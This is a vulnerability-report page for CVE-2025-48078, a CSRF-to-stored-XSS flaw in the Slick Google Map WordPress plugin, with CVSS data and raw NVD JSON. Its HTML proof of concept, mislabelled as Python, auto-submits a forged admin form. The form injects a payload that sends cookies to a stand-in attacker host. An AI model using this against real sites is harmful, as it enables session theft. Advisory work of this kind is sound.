Security Vulnerability Report
中文
CVE-2025-48078 CVSS 7.1 HIGH

CVE-2025-48078

Published: 2025-11-06 16:15:52
Last Modified: 2026-04-27 20:16:06

Description

Cross-Site Request Forgery (CSRF) vulnerability in Norbert Slick Google Map slick-google-map allows Stored XSS.This issue affects Slick Google Map: from n/a through <= 0.3.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Slick Google Map <= 0.3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-48078: Slick Google Map CSRF to Stored XSS --> <html> <body> <p>CSRF Attack - Slick Google Map Plugin <= 0.3</p> <form action="http://target-wordpress-site.com/wp-admin/admin.php?page=slick-google-map" method="POST" id="csrfForm"> <input type="hidden" name="action" value="save_map" /> <input type="hidden" name="map_title" value="Map<script>alert(document.cookie)</script>" /> <input type="hidden" name="map_description" value="<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>" /> <input type="hidden" name="map_latitude" value="40.7128" /> <input type="hidden" name="map_longitude" value="-74.0060" /> <input type="hidden" name="nonce" value="" /> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48078", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:51.670", "lastModified": "2026-04-27T20:16:06.320", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Norbert Slick Google Map slick-google-map allows Stored XSS.This issue affects Slick Google Map: from n/a through <= 0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/slick-google-map/vulnerability/wordpress-slick-google-map-plugin-0-3-cross-site-request-forgery-csrf-to-stored-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}